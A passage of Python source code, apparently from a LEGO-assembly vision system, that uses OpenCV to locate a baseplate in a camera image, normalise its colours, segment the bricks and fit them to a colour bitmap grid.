## find a point that we are confident is in the board
# print bd_counts
max_idx = bd_counts.argmax()
i, j = zc.ind2sub((config.BD_COUNT_N_ROW, config.BD_COUNT_N_COL), max_idx)
if bd_counts[i, j] < config.BD_COUNT_THRESH:
raise LEGOCVError('Too little black dots, maybe image blurred')
# return (rtn_msg, None, None, None)
in_board_p = (
(i + 0.5) * config.BD_BLOCK_HEIGHT, (j + 0.5) * config.BD_BLOCK_WIDTH)
## locate the board by finding the contour that is likely to be of the board
closest_cnt = zc.get_closest_contour(contours, hierarchy, in_board_p,
min_span=config.BD_BLOCK_SPAN,
hierarchy_req='inner')
if closest_cnt is None or (not zc.is_roughly_convex(closest_cnt)):
# rtn_msg = {'status' : 'fail',
# 'message': 'Cannot locate board border, maybe not the full '
# 'board is in the scene. Failed at stage 1'}
# return (rtn_msg, None, None, None)
raise NoBoardDetectedError('Stage 1: Could not locate board border in '
'frame.')
hull = cv2.convexHull(closest_cnt)
mask_board = np.zeros(mask_black.shape, dtype=np.uint8)
cv2.drawContours(mask_board, [hull], 0, 255, -1)
## polish the board border in case the background is close to black
cv2.drawContours(mask_board, [hull], 0, 255, 5)
img_tmp = img.copy()
img_tmp[np.invert(mask_board.astype(bool)), :] = 180
DoB = zc.get_DoB(img_tmp, config.BLUR_KERNEL_SIZE, 1, method='Average')
# mask_black = color_inrange(DoB, 'HSV', V_L=config.BLACK_DOB_MIN_V)
mask_black = LEGOColorDOBMaskBlack.get_mask(DoB)
contours, hierarchy = cv2.findContours(mask_black, mode=cv2.RETR_CCOMP,
method=cv2.CHAIN_APPROX_NONE)
closest_cnt = zc.get_closest_contour(contours, hierarchy, in_board_p,
min_span=config.BD_BLOCK_SPAN,
hierarchy_req='inner')
if closest_cnt is None or (not zc.is_roughly_convex(closest_cnt)):
# rtn_msg = {'status' : 'fail',
# 'message': 'Cannot locate board border, maybe not the
# full '
# 'board is in the scene. Failed at stage 2'}
# return (rtn_msg, None, None, None)
raise NoBoardDetectedError('Stage 2: Could not locate board border in '
'frame. ')
hull = cv2.convexHull(closest_cnt)
mask_board = np.zeros(mask_black.shape, dtype=np.uint8)
cv2.drawContours(mask_board, [hull], 0, 255, -1)
img_board = np.zeros(img.shape, dtype=np.uint8)
img_board = cv2.bitwise_and(img, img, dst=img_board, mask=mask_board)
# zc.check_and_display('board_original', img_board, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
## sanity checks
if mask_board[int(in_board_p[0]), int(in_board_p[1])] == 0:
# print(in_board_p)
# rtn_msg = {'status' : 'fail',
# 'message': 'Best board candidate fails sanity check, '
# 'black dots are not inside the board...'}
# # return (rtn_msg, None, None, None)
raise NoBoardDetectedError('Best candidate failed sanity check.')
return hull, mask_board, img_board
def _detect_lego(img_board, display_list, method='edge', edge_th=[80, 160],
mask_black_dots=None, mask_lego_rough=None, add_color=True):
if method == 'edge':
bw_board = cv2.cvtColor(img_board, cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(bw_board, edge_th[0], edge_th[1], apertureSize=3)
# zc.check_and_display('board_edge', edges, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
edges = cv2.morphologyEx(edges, cv2.MORPH_CLOSE,
zc.generate_kernel(7, 'circular'),
iterations=1) # magic kernel size
edges = cv2.morphologyEx(edges, cv2.MORPH_OPEN,
zc.generate_kernel(3, 'square'), iterations=1)
mask_rough = cv2.bitwise_not(edges)
if add_color:
mask_color = detect_colorful(img_board)
mask = cv2.bitwise_or(mask_rough, mask_color)
else:
mask = mask_rough
# zc.check_and_display('edge_inv', mask, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
elif method == 'dots':
mask = cv2.morphologyEx(mask_black_dots, cv2.MORPH_CLOSE,
zc.generate_kernel(11, 'square'),
iterations=1) # magic kernel size
mask = cv2.bitwise_not(mask)
elif method == 'fill': # This is not finished. Not working well with
# initial tests. Don't use it.
img = img_board.copy()
mask_black_dots_bool = mask_black_dots.astype(bool)
img[mask_black_dots_bool, :] = 0
kernel = zc.generate_kernel(3, method='circular')
for iter in range(1):
img_tmp = cv2.dilate(img, kernel, iterations=1)
img[mask_black_dots_bool] = img_tmp[mask_black_dots_bool]
mask_black_dots = cv2.erode(mask_black_dots, kernel, iterations=1)
mask_black_dots_bool = mask_black_dots.astype(bool)
bw_board = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(bw_board, 100, 200, apertureSize=3)
return img, edges
# In case the large border of board is considered to be the best candidate
if mask_lego_rough is not None:
mask = cv2.bitwise_and(mask, mask_lego_rough)
mask_lego, _ = zc.find_largest_CC(mask,
min_area=config.BOARD_RECONSTRUCT_AREA
/ 300.0,
min_convex_rate=0.2,
ref_p=config.BOARD_RECONSTRUCT_CENTER,
max_dist_ref_p=config.BOARD_RECONSTRUCT_PERI / 15.0)
if mask_lego is None:
# rtn_msg = {'status' : 'fail',
# 'message': 'Cannot find a large enough foreground near
# the '
# 'center of board'}
# return (rtn_msg, None, None)
raise NoLEGODetectedError('Cannot find a large enough foreground near '
'the center of the board.')
img_lego = np.zeros(img_board.shape, dtype=np.uint8)
img_lego = cv2.bitwise_and(img_board, img_board, dst=img_lego,
mask=mask_lego)
return img_lego, mask_lego
def _find_lego(img, stretch_ratio, display_list):
######################## detect board ######################################
hull, mask_board, img_board = _locate_board(img, display_list)
## some properties of the board
board_area = cv2.contourArea(hull)
if board_area < config.BOARD_MIN_AREA:
# rtn_msg = {'status': 'fail', 'message': 'Detected board too small'}
# return (rtn_msg, None)
raise NoBoardDetectedError('Detected board too small.')
M = cv2.moments(hull)
board_center = (
int(M['m01'] / M['m00']),
int(M['m10'] / M['m00'])) # in (row, col) format
board_perimeter = cv2.arcLength(hull, True)
# print "Board statistics: area: %d, center: %s, perimeter: %d" % (
# board_area, board_center, board_perimeter)
## find the perspective correction matrix
board_border = np.zeros(mask_board.shape, dtype=np.uint8)
cv2.drawContours(board_border, [hull], 0, 255, 1)
corners = get_corner_pts(board_border, board_perimeter, board_center,
method='line')
if corners is None:
raise NoBoardDetectedError('Cannot locate exact four board corners.')
thickness = int(calc_thickness(corners,
stretch_ratio) * 0.8) # TODO: should be
# able to be more accurate
# print "Brick thickness: %d pixels" % thickness
if config.OPT_FINE_BOARD:
# first get a rough perspective matrix
margin = config.BOARD_RECONSTRUCT_WIDTH // 5
target_points = np.float32([[margin, margin],
[config.BOARD_RECONSTRUCT_WIDTH + margin,
margin], [margin,
config.BOARD_RECONSTRUCT_HEIGHT + margin],
[config.BOARD_RECONSTRUCT_WIDTH + margin,
config.BOARD_RECONSTRUCT_HEIGHT + margin]])
perspective_mtx = cv2.getPerspectiveTransform(corners, target_points)
board_border = cv2.warpPerspective(board_border, perspective_mtx, (
config.BOARD_RECONSTRUCT_WIDTH + margin * 2,
config.BOARD_RECONSTRUCT_HEIGHT + margin * 2),
flags=cv2.INTER_NEAREST)
# fine adjustment to get more accurate perpective matrix
corners = get_corner_pts(board_border, method='point')
target_points = np.float32([[0, 0], [config.BOARD_RECONSTRUCT_WIDTH, 0],
[0, config.BOARD_RECONSTRUCT_HEIGHT],
[config.BOARD_RECONSTRUCT_WIDTH,
config.BOARD_RECONSTRUCT_HEIGHT]])
perspective_mtx2 = cv2.getPerspectiveTransform(corners, target_points)
perspective_mtx = np.dot(perspective_mtx2, perspective_mtx)
else:
target_points = np.float32([[0, 0], [config.BOARD_RECONSTRUCT_WIDTH, 0],
[0, config.BOARD_RECONSTRUCT_HEIGHT],
[config.BOARD_RECONSTRUCT_WIDTH,
config.BOARD_RECONSTRUCT_HEIGHT]])
perspective_mtx = cv2.getPerspectiveTransform(corners, target_points)
## convert board to standard size for further processing
# img_board_original = img_board
img_board = cv2.warpPerspective(img_board, perspective_mtx, (
config.BOARD_RECONSTRUCT_WIDTH, config.BOARD_RECONSTRUCT_HEIGHT))
# zc.check_and_display('board', img_board, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
#################### detect Lego on the board ##############################
## locate Lego approach 1: using edges with pre-normalized image,
# edge threshold is also pre-defined
img_lego_u_edge_S, mask_lego_u_edge_S = _detect_lego(img_board,
display_list,
method='edge',
edge_th=[50,
100],
add_color=False)
mask_lego_rough_L = zc.expand(mask_lego_u_edge_S, 21, method='circular',
iterations=2)
mask_lego_rough_S = zc.expand(mask_lego_u_edge_S, 11, method='circular',
iterations=2)
# mask_lego_rough_L_inv = cv2.bitwise_not(mask_lego_rough_L)
mask_lego_rough_S_inv = cv2.bitwise_not(mask_lego_rough_S)
## correct color of board
# find an area that should be grey in general
# area where there are a lot of edges AND area far from the edges of board
mask_grey = np.zeros(
(config.BOARD_RECONSTRUCT_HEIGHT, config.BOARD_RECONSTRUCT_WIDTH),
dtype=np.uint8)
mask_grey[
10: config.BOARD_RECONSTRUCT_HEIGHT - 10,
50: config.BOARD_RECONSTRUCT_WIDTH - 60
] = 255
mask_board = np.zeros(
(config.BOARD_RECONSTRUCT_HEIGHT, config.BOARD_RECONSTRUCT_WIDTH),
dtype=np.uint8)
mask_board[
10: config.BOARD_RECONSTRUCT_HEIGHT - 10,
10: config.BOARD_RECONSTRUCT_WIDTH - 10
] = 255
mask_grey = cv2.bitwise_and(mask_grey, mask_lego_rough_S_inv)
mask_grey_bool = mask_grey.astype(bool)
if not np.any(mask_grey_bool):
# rtn_msg = {'status' : 'fail',
# 'message': 'Cannot find grey area, maybe image blurred'}
# return (rtn_msg, None)
raise NoLEGODetectedError('Cannot find grey area, blurry image?')
if 'board_grey' in display_list:
img_board_grey = np.zeros(img_board.shape, dtype=np.uint8)
img_board_grey = cv2.bitwise_and(img_board, img_board,
dst=img_board_grey, mask=mask_grey)
# zc.check_and_display('board_grey', img_board_grey, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
## locate Lego approach 1 continued: refinement by using auto selected
# thresholds
bw_board = cv2.cvtColor(img_board, cv2.COLOR_BGR2GRAY)
dynamic_range = bw_board[mask_grey_bool].max() - bw_board[
mask_grey_bool].min()
edge_th = [dynamic_range / 4 + 35, dynamic_range / 2 + 70]
img_lego_u_edge_S, mask_lego_u_edge_S = _detect_lego(img_board,
display_list,
method='edge',
edge_th=edge_th,
add_color=False)
# zc.check_and_display('lego_u_edge_S', img_lego_u_edge_S, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
## locate Lego approach 2: using edges with normalized image
# the three steps below for color correction is not well studied,
# but it's here for historical reasons...
img_board_n0 = normalize_color(img_board, mask_apply=mask_board,
mask_info=mask_grey, method='grey')
img_board_n0 = normalize_brightness(img_board_n0, mask=mask_board,
method='max')
img_board_n0 = normalize_color(img_board_n0, mask_apply=mask_board,
mask_info=mask_grey, method='hist')
# zc.check_and_display('board_n0', img_board_n0, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
bw_board_n0 = cv2.cvtColor(img_board_n0, cv2.COLOR_BGR2GRAY)
dynamic_range = bw_board_n0[mask_grey_bool].max() - bw_board_n0[
mask_grey_bool].min()
edge_th = [dynamic_range / 4 + 35, dynamic_range / 2 + 70]
img_lego_u_edge_norm_L, mask_lego_u_edge_norm_L = _detect_lego(
img_board_n0, display_list, method='edge', edge_th=edge_th,
add_color=True)
# zc.check_and_display('lego_u_edge_norm_L', img_lego_u_edge_norm_L,
# display_list, wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
## locate Lego approach 3: using dots with pre-normalized image
# black dot detection
mask_lego_bool = mask_lego_u_edge_S.astype(bool)
img_board_tmp = img_board.copy()
img_board_tmp[mask_lego_bool, :] = (int(
bw_board[mask_grey_bool].max()) + int(
bw_board[mask_grey_bool].min())) / 2
DoB = zc.get_DoB(img_board_tmp, 41, 1, method='Average')
DoB[mask_lego_bool] = 0
# DoB[mask_lego_rough_L_inv] = 0
# zc.check_and_display('board_DoB', DoB, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
# mask_black = color_inrange(DoB, 'HSV', V_L=config.BD_DOB_MIN_V)
mask_black = LEGOColorDOBMaskBlack.get_mask(DoB)
# zc.check_and_display('board_mask_black', mask_black, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
mask_black_dots, n_cnts = zc.get_small_blobs(mask_black,
max_peri=config.BOARD_BD_MAX_PERI)
if n_cnts < 1000: # some sanity check
# rtn_msg = {'status' : 'fail',
# 'message': 'Too little black dots with more accurate dot '
# 'detection. Image may be blurred'}
# return (rtn_msg, None)
raise NoBoardDetectedError('Too few black dots, blurry image?')
# zc.check_and_display('board_mask_black_dots', mask_black_dots,
# display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
img_lego_u_dots_L, mask_lego_u_dots_L = _detect_lego(
img_board,
display_list,
method='dots',
mask_black_dots=mask_black_dots,
mask_lego_rough=mask_lego_rough_L,
add_color=False)
# zc.check_and_display('lego_u_dots_L', img_lego_u_dots_L, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
## detect colors of Lego
mask_no_black_dots = cv2.bitwise_and(mask_grey,
cv2.bitwise_not(mask_black_dots))
# correct color in different ways
img_board_n1 = normalize_color(img_board, mask_apply=mask_board,
mask_info=mask_grey, method='grey')
img_board_n2 = normalize_brightness(img_board_n1, mask=mask_board,
method='max', max_percentile=95,
min_percentile=1)
img_board_n3 = normalize_color(img_board, mask_apply=mask_board,
mask_info=mask_black_dots, method='grey')
img_board_n4 = normalize_brightness(img_board_n3, mask=mask_board,
method='max', max_percentile=95,
min_percentile=1)
img_board_n5 = normalize_color(img_board, mask_apply=mask_board,
mask_info=mask_no_black_dots, method='grey')
img_board_n6 = normalize_brightness(img_board_n5, mask=mask_board,
method='max', max_percentile=95,
min_percentile=1)
# zc.check_and_display('board_n1', img_board_n1, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
# zc.check_and_display('board_n2', img_board_n2, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
# zc.check_and_display('board_n3', img_board_n3, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
# zc.check_and_display('board_n4', img_board_n4, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
# zc.check_and_display('board_n5', img_board_n5, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
# zc.check_and_display('board_n6', img_board_n6, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
mask_green, mask_red, mask_yellow, mask_blue = detect_colors(img_board,
mask_lego_u_edge_S)
mask_green_n1, mask_red_n1, mask_yellow_n1, mask_blue_n1 = detect_colors(
img_board_n1, mask_lego_u_edge_S)
mask_green_n3, mask_red_n3, mask_yellow_n3, mask_blue_n3 = detect_colors(
img_board_n3, mask_lego_u_edge_S)
mask_green = zc.super_bitwise_and(
(mask_green, mask_green_n1, mask_green_n3, mask_lego_u_edge_norm_L))
mask_yellow = zc.super_bitwise_and(
(mask_yellow, mask_yellow_n1, mask_yellow_n3, mask_lego_u_edge_norm_L))
mask_red = zc.super_bitwise_and(
(mask_red, mask_red_n1, mask_red_n3, mask_lego_u_edge_norm_L))
mask_blue = zc.super_bitwise_and(
(mask_blue, mask_blue_n1, mask_blue_n3, mask_lego_u_edge_norm_L))
if 'lego_only_color' in display_list:
color_labels = np.zeros(img_board.shape[0:2], dtype=np.uint8)
color_labels[mask_green.astype(bool)] = 2
color_labels[mask_yellow.astype(bool)] = 3
color_labels[mask_red.astype(bool)] = 4
color_labels[mask_blue.astype(bool)] = 5
img_color = bm.bitmap2syn_img(color_labels)
# zc.check_and_display('lego_only_color', img_color, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
mask_green = zc.expand_with_bound(mask_green, mask_lego_u_dots_L)
mask_yellow = zc.expand_with_bound(mask_yellow, mask_lego_u_dots_L)
mask_red = zc.expand_with_bound(mask_red, mask_lego_u_dots_L)
mask_blue = zc.expand_with_bound(mask_blue, mask_lego_u_dots_L)
## add colorful parts to the Lego to get Lego with all sides
mask_lego_full = zc.super_bitwise_or(
(mask_green, mask_yellow, mask_red, mask_blue, mask_lego_u_edge_S))
mask_lego_full, _ = zc.find_largest_CC(mask_lego_full,
min_area=config.BOARD_RECONSTRUCT_AREA / 300.0,
min_convex_rate=0.2,
ref_p=config.BOARD_RECONSTRUCT_CENTER,
max_dist_ref_p=config.BOARD_RECONSTRUCT_PERI / 15.0)
if mask_lego_full is None:
# rtn_msg = {'status' : 'fail',
# 'message': 'Cannot find a large enough foreground near
# the '
# 'center of the board after adding all colors '
# 'back to Lego'}
# return (rtn_msg, None, None)
raise NoLEGODetectedError(
'Cannot find a large enough foreground near the '
'center of the board after adding all colors back to Lego')
img_lego_full = np.zeros(img_board.shape, dtype=np.uint8)
img_lego_full = cv2.bitwise_and(img_board, img_board, dst=img_lego_full,
mask=mask_lego_full)
# zc.check_and_display('lego_full', img_lego_full, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
## erode side parts in original view
img_lego_full_original = cv2.warpPerspective(img_lego_full, perspective_mtx,
img.shape[1::-1],
flags=cv2.WARP_INVERSE_MAP)
mask_lego_full_original = zc.get_mask(img_lego_full_original)
# treat white brick differently to prevent it from erosion
hsv_lego = cv2.cvtColor(img_lego_full_original, cv2.COLOR_BGR2HSV)
# mask_lego_white = detect_color(hsv_lego, 'white')
mask_lego_white = LEGOColorWhite.get_mask(hsv_lego)
mask_lego_white, _ = zc.get_big_blobs(mask_lego_white, min_area=25)
kernel = np.uint8([[0, 0, 0], [0, 1, 0], [0, 1, 0]])
mask_lego = cv2.erode(mask_lego_full_original, kernel, iterations=thickness)
mask_lego = cv2.bitwise_or(mask_lego, mask_lego_white)
mask_lego, _ = zc.find_largest_CC(mask_lego)
if mask_lego is None:
# rtn_msg = {'status' : 'fail',
# 'message': 'Cannot find Lego on the board after eroding '
# 'side parts'}
# return (rtn_msg, None)
raise NoLEGODetectedError('Cannot find Lego on the board after '
'eroding side parts.')
img_lego = np.zeros(img.shape, dtype=np.uint8)
img_lego = cv2.bitwise_and(img, img, dst=img_lego,
mask=mask_lego) # this is weird, if not
# providing an input image, the output will be with random backgrounds...
# how is dst initialized?
img_lego = cv2.warpPerspective(img_lego, perspective_mtx, (
config.BOARD_RECONSTRUCT_WIDTH, config.BOARD_RECONSTRUCT_HEIGHT))
# zc.check_and_display('lego', img_lego, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
return (img_lego, img_lego_full, img_board, (
img_board_n0, img_board_n1, img_board_n2, img_board_n3, img_board_n4,
img_board_n5, img_board_n6), perspective_mtx)
# def _find_lego_noboard(img, stretch_ratio, display_list):
# '''
# Find lego without the help of board (e.g. put the lego pieces directly on
# the table.
# Not finished.
# '''
# bw = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# edges = cv2.Canny(bw, 50, 100, apertureSize=3)
# zc.check_and_display('edge', edges, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
# edges_dilated = zc.expand(edges, 3)
#
# mask_lego = np.zeros(img.shape, dtype=np.uint8)
# contours, hierarchy = cv2.findContours(edges_dilated, mode=cv2.RETR_CCOMP,
# method=cv2.CHAIN_APPROX_NONE)
# for cnt_idx, cnt in enumerate(contours):
# if hierarchy[0, cnt_idx, 3] == -1:
# continue
# mask_tmp = np.zeros(bw.shape, dtype=np.uint8)
# cv2.drawContours(mask_tmp, contours, cnt_idx, 255, -1)
# mask_tmp = zc.expand(mask_tmp, 3)
# contours_tmp, hierarchy_tmp = cv2.findContours(mask_tmp,
# mode=cv2.RETR_CCOMP,
# method=cv2.CHAIN_APPROX_NONE)
# cnt_tmp = contours_tmp[0]
# mask_tmp = np.zeros(bw.shape, dtype=np.uint8)
# cv2.drawContours(mask_tmp, [cnt_tmp], 0, 255, 1)
# cv2.drawContours(mask_lego, contours, cnt_idx, [255, 255, 255], -1)
#
# lines = cv2.HoughLinesP(mask_tmp, 1, np.pi / 180, 3, minLineLength=4,
# maxLineGap=1)
# if lines is None:
# continue
# lines = lines[0]
# for line in lines:
# pt1 = (line[0], line[1])
# pt2 = (line[2], line[3])
# cv2.line(mask_lego, pt1, pt2, (0, 0, 255), 1)
#
# line_groups = []
# for line in lines:
# merge_flag = False
# for line_group in line_groups:
# print((is_line_seg_close(line_group, line),
# is_line_seg_close2(line_group, line)))
# if is_line_seg_close(line_group, line) and is_line_seg_close(
# line_group, line):
# merge_flag = True
# line_group_new = line_group.copy()
# line_group_new[0] = min(line_group[0], line_group[2],
# line[0], line[2])
# line_group_new[1] = min(line_group[1], line_group[3],
# line[1], line[3])
# line_group_new[2] = max(line_group[0], line_group[2],
# line[0], line[2])
# line_group_new[3] = max(line_group[1], line_group[3],
# line[1], line[3])
# line_group[0] = line_group_new[0]
# line_group[1] = line_group_new[1]
# line_group[2] = line_group_new[2]
# line_group[3] = line_group_new[3]
# if not merge_flag:
# line_groups.append(line)
# for line in line_groups:
# pt1 = (line[0], line[1])
# pt2 = (line[2], line[3])
# cv2.line(mask_lego, pt1, pt2, (0, 255, 0), 1)
#
# zc.check_and_display('edge_inv', mask_lego, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
#
# rtn_msg = {'status': 'fail', 'message': 'nothing'}
# return (rtn_msg, None)
def _correct_orientation(img_lego, img_lego_full, display_list):
objects = rotate(img_lego)
img_lego_correct, rotation_degree, rotation_mtx = objects
objects = rotate(img_lego_full)
img_lego_full_correct, rotation_degree_full, rotation_mtx = objects
# print (rotation_degree, rotation_degree_full)
rotation_degree = rotation_degree * 0.6 + rotation_degree_full * 0.4
rotation_mtx = cv2.getRotationMatrix2D(
(img_lego.shape[1] / 2, img_lego.shape[0] / 2), rotation_degree,
scale=1)
img_lego_correct = cv2.warpAffine(img_lego, rotation_mtx,
(img_lego.shape[1], img_lego.shape[0]))
img_lego_full_correct = cv2.warpAffine(img_lego_full, rotation_mtx, (
img_lego.shape[1], img_lego.shape[0]))
# zc.check_and_display('lego_correct', img_lego_correct, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
return img_lego_correct, img_lego_full_correct, rotation_mtx
# def _get_rectangular_area(img_board, img_correct, rotation_mtx, display_list):
# img_shape = img_correct.shape
# img_cropped, borders = crop(img_correct, None)
# min_row, max_row, min_col, max_col = borders
# mask_rect = np.zeros(img_correct.shape[0:2], dtype=np.uint8)
# mask_rect[min_row: max_row + 1, min_col: max_col + 1] = 255
# mask_rect = cv2.warpAffine(mask_rect, rotation_mtx,
# (img_shape[1], img_shape[0]),
# flags=cv2.WARP_INVERSE_MAP)
#
# img_lego_rect = np.zeros(img_board.shape, dtype=np.uint8)
# img_lego_rect = cv2.bitwise_and(img_board, img_board, dst=img_lego_rect,
# mask=mask_rect)
# img_lego_rect = cv2.warpAffine(img_lego_rect, rotation_mtx,
# (img_shape[1], img_shape[0]))
#
# # zc.check_and_display('lego_rect', img_lego_rect, display_list,
# # wait_time=config.DISPLAY_WAIT_TIME,
# # resize_max=config.DISPLAY_MAX_PIXEL,
# # save_image=config.SAVE_IMAGE)
#
# rtn_msg = {'status': 'success'}
# return rtn_msg, img_lego_rect
def _img2bitmap(img, color_cumsums, n_rows, n_cols, lego_color):
height, width, _ = img.shape
img_plot = None
bitmap = np.zeros((n_rows, n_cols), dtype=int)
best_ratio = 0
best_bitmap = None
best_plot = None
best_offset = None
offset_range = {'t': 0,
'b': int(round(config.BRICK_HEIGHT / 3)),
'l': int(round(config.BRICK_WIDTH / 3)),
'r': int(round(config.BRICK_WIDTH / 3))}
for height_offset_t in range(0, offset_range['t'] + 1, 2):
for height_offset_b in range(0, offset_range['b'] + 1, 2):
for width_offset_l in range(0, offset_range['l'] + 1, 2):
for width_offset_r in range(0, offset_range['r'] + 1, 2):
if 'plot_line' in config.DISPLAY_LIST:
if lego_color is not None:
img_plot = lego_color.copy()
else:
img_plot = img.copy()
test_height = height - height_offset_t - height_offset_b
test_width = width - width_offset_l - width_offset_r
block_height = float(test_height) / n_rows
block_width = float(test_width) / n_cols
n_pixels = test_height * test_width
n_pixels_center = 0
n_good_pixels = 0
n_good_pixels_center = 0
worst_ratio_block = 1 # set to maximum
for i in range(n_rows):
i_start = int(round(block_height * i)) + height_offset_t
i_end = int(
round(block_height * (i + 1))) + height_offset_t
for j in range(n_cols):
j_start = int(
round(block_width * j)) + width_offset_l
j_end = int(
round(block_width * (j + 1))) + width_offset_l
if 'plot_line' in config.DISPLAY_LIST:
cv2.line(img_plot, (j_end, 0),
(j_end, height - 1), (255, 255, 0), 1)
cv2.line(img_plot, (0, i_end),
(width - 1, i_end), (255, 255, 0), 1)
cv2.line(img_plot, (j_start, 0),
(j_start, height - 1), (255, 255, 0),
1)
cv2.line(img_plot, (0, i_start),
(width - 1, i_start), (255, 255, 0), 1)
color_sum = {}
for color_key, color_cumsum in \
color_cumsums.items():
# focus more on center part
color_sum[color_key] = \
color_cumsum[
i_end - config.BLOCK_DETECTION_OFFSET,
j_end - config.BLOCK_DETECTION_OFFSET] \
- color_cumsum[
i_start + config.BLOCK_DETECTION_OFFSET,
j_end - config.BLOCK_DETECTION_OFFSET] \
- color_cumsum[
i_end - config.BLOCK_DETECTION_OFFSET,
j_start +
config.BLOCK_DETECTION_OFFSET] \
+ color_cumsum[
i_start + config.BLOCK_DETECTION_OFFSET,
j_start + config.BLOCK_DETECTION_OFFSET]
counts = [color_sum['nothing'], color_sum['white'],
color_sum['green'], color_sum['yellow'],
color_sum['red'], color_sum['blue'],
color_sum['black'], color_sum['unsure']]
color_idx = np.argmax(counts[:-1])
bitmap[i, j] = color_idx
# percentage correct for center part of block
n_pixels_block_center = sum(counts)
ratio_block_center = \
float(counts[color_idx]) / n_pixels_block_center
n_pixels_center += n_pixels_block_center
n_good_pixels_center += counts[color_idx]
color_cumsum = color_cumsums[
config.COLOR_ORDER[color_idx]]
n_good_pixels_block = color_cumsum[i_end, j_end] \
- color_cumsum[i_start,
j_end] \
- color_cumsum[i_end,
j_start] \
+ color_cumsum[
i_start, j_start]
color_cumsum = color_cumsums['unsure']
n_good_pixels_block += \
(color_cumsum[i_end, j_end]
- color_cumsum[i_start, j_end]
- color_cumsum[i_end, j_start]
+ color_cumsum[i_start, j_start]) / 2.0
# unsure pixels are half right
n_good_pixels += n_good_pixels_block
n_pixels_block = \
(j_end - j_start) * (i_end - i_start)
# percentage correct for entire block
ratio_block = n_good_pixels_block / n_pixels_block
if config.OPT_NOTHING and color_idx == 0:
ratio_block *= 0.9
ratio_block = ratio_block * 0.34 + \
ratio_block_center * 0.66
if ratio_block < worst_ratio_block:
worst_ratio_block = ratio_block
ratio = float(n_good_pixels) / n_pixels * 0.34 + float(
n_good_pixels_center) / n_pixels_center * 0.66
# print "worst ratio within block: %f" % worst_ratio_block
if worst_ratio_block > config.WORST_RATIO_BLOCK_THRESH \
and ratio > best_ratio:
best_ratio = ratio
best_bitmap = bitmap.copy()
best_plot = img_plot
best_offset = (
height_offset_t, height_offset_b, width_offset_l,
width_offset_r)
return best_bitmap, best_ratio, best_plot, best_offset
def _reconstruct_lego(img_lego, img_board, img_board_ns, rotation_mtx,
display_list):
def _lego_outof_board(mask_lego, img_board, rotation_mtx, borders):
img_lego = np.zeros(img_board.shape, dtype=np.uint8)
img_lego = cv2.bitwise_and(img_board, img_board, dst=img_lego,
mask=mask_lego)
img_lego = cv2.warpAffine(img_lego, rotation_mtx,
(img_board.shape[1], img_board.shape[0]))
if borders is None:
img_lego, borders = crop(img_lego, None)
min_row, max_row, min_col, max_col = borders
img_lego, borders = smart_crop(img_lego)
i_start, i_end, j_start, j_end = borders
borders = (min_row + i_start, min_row + i_end, min_col + j_start,
min_col + j_end)
else:
img_lego, borders = crop(img_lego, borders)
return img_lego, borders
## get Lego images that are color-corrected in different ways
img_board_n0, img_board_n1, img_board_n2, img_board_n3, img_board_n4, \
